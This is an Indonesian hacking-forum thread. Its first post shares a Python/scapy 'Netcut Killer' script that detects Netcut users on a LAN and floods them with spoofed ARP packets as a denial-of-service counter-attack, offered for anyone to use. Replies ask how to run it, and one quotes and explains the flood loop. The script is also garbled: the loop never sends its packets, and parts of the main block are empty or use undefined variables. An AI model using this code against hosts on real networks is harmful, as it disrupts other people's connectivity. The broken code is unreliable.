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Netcut Killer ! - gembel - 02-21-2012

"Netcut 2.0 Denial Of Service" atau bisa juga disebut Netcut Killer
Buat yang sering di cut cut ama netcut si wedus pake aja tools ini, dijamin modarrr yang nyerang ente

ini dia

#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Author: MaYaSeVeN
#Greetz: Inj3ct0r 1337day Exploit DataBase (
#PoC: Video
#Version: Netcut 2
#Software Link:
#Tested on: Windows Xp, Windows 7
#Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma

from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
import commands,os,sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip  = commands.getoutput("ip route list | grep default").split()[2]
def protect(gw_ip,gw_mac):
        os.popen("arp -s %s %s" %(gw_ip,gw_mac))
        print "Protected himself"
def detect():
                ans = sniff(filter='arp',timeout=7)
                for r in ans.res:
                        target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
                return target

def preattack(gw_ip):
        num = []
        count = 0
        target = 0
        temp = 0
        print "Detecting..."
        d = detect()
        for i in range(len(d)):
                if d[i].split()[0] == "":
                        if d.count(d[i]) > count:
                                count = d.count(d[i])
                                target = i
                if d[i].split()[0] == gw_ip:
                        temp += 1        
        if len(d) < 7:
                print "[-] No one use Netcut or try again"
        if len(num)*7 < temp:
                num[:] = []
                count = 0
                result = float(temp)/len(d)*100
                for j in range(len(d)):
                        if d[i].split()[0] == gw_ip:
                                if d.count(d[i]) > count:
                                        count = d.count(d[i])
                                        target = i
                        result = float(temp)/len(d)*100
                print target
                result = float(num[0]+temp)/len(d)*100
        print "There is a possibility that " + str(result) + "%"
        if result>= 50:
                target_mac = d[target].split()[1]
                target_ip = d[target].split()[2]
                print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
                print "[-] No one use Netcut or try again"

def attack(target_mac,target_ip,gw_ip):
        print "[+]Counter Attack !!!"
        e = Ether(dst="FF:FF:FF:FF:FF:FF")
        while 1:
                a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
                p = e/a/Padding("\x00"*18)
                a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
                p1 = e/a1/Padding("\x00"*18)
if __name__ == '__main__':
        print   "###################################################"
        print   " __  __        __       __     _____   __        __  _   _"
        print   "|  \/  |   \ \   / /   / ____|  \ \    / / | \ | |"
        print   "| \  / | __ \ \_/ /_ _| (___   __\ \  / /__|  \| |"
        print   "| |\/| |/ _\ \   / _\ |\___ \ / _ \ \/ / _ \ . \ |"
        print   "| |  | | (_| || | (_| |____) |  __/\  /  __/ |\  |"
        print   "|_|  |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
        print   " "
        print   "###################################################"
        print   ""
        print   ""
        print   ""
        if len(sys.argv) == 2 or len(sys.argv) == 3:
                if len(sys.argv) == 2:
                if len(sys.argv) == 3:
                        gw_mac = sys.argv[2]
                print '''Mode:  
1.)Attack only
Usage: NetcutKiller <Interface>
e.g. wlan0
2.)Attack with protect himself
Usage: NetcutKiller <Interface> <MAC_Gateway>
e.g. wlan0 00:FA:77:AA:BC:AF

Ada juga nih Videony kalo penasaran mau lihat apa yang terjadi ama si pengguna Netcut kalau kita menjalankan tool ini
Okelah kalau begitu selamat mencoba


RE: Netcut Killer ! - riv182 - 02-21-2012

cara masang codenya gimana om maklum cupu ane om....

RE: Netcut Killer ! - THJC - 02-21-2012

Bingung saya Smile
Coba dijabarkan dalam kata2 dong om Smile

RE: Netcut Killer ! - riv182 - 02-21-2012

(02-21-2012, 10:45 PM)THJC Wrote: Bingung saya Smile
Coba dijabarkan dalam kata2 dong om Smile

sama bingungnya ane bener mesti dijelaskan detail donk ayo donk om

RE: Netcut Killer ! - N4d - 02-21-2012

wkekekek kata kata MODAR nya seru aseekk kk..Smile

RE: Netcut Killer ! - gembel - 02-22-2012

(02-21-2012, 10:58 PM)riv182 Wrote:
(02-21-2012, 10:45 PM)THJC Wrote: Bingung saya Smile
Coba dijabarkan dalam kata2 dong om Smile

sama bingungnya ane bener mesti dijelaskan detail donk ayo donk om

Bingung dimana nya om ?

RE: Netcut Killer ! - iKONspirasi - 02-22-2012

wkwkwk ngeriii kaleee.... yg pake netcut bisa kena DoS di memory usage-nya Big Grin

manteb nih tools, save aja code diatas sebagai file python .py trus jalanin deh Smile

lupa, +1 dari ane hehe

RE: Netcut Killer ! - elnino09121991 - 02-22-2012

itu pake eclipse ya ?
gimana aja langkah2 nya?
#pengguna baru bertanya

RE: Netcut Killer ! - riv182 - 02-22-2012

(02-22-2012, 06:13 AM)konspirasi Wrote: wkwkwk ngeriii kaleee.... yg pake netcut bisa kena DoS di memory usage-nya Big Grin

manteb nih tools, save aja code diatas sebagai file python .py trus jalanin deh Smile

lupa, +1 dari ane hehe

cara calaninnya gimana om Big Grin

RE: Netcut Killer ! - u5h4nt - 02-22-2012

ini tools buat nge-detect yg pake netcut dalam LAN/WLAN yahh ... terus klo brhasil kedetect , maka yg make netcut bakal di counter attack (DDOS) di bagian ini

while 1:
        a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
        p = e/a/Padding("\x00"*18)
        a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
        p1 = e/a1/Padding("\x00"*18)

gitu yah ??weeww kereen nehh . Smile
mmmmm ini klo gug salah bukan cuman netcut doang .. pokoknya semua yang ngejalanin tools dgn metode ARP Spoofing/Poisonning bakal kena ma tools ini ... Smile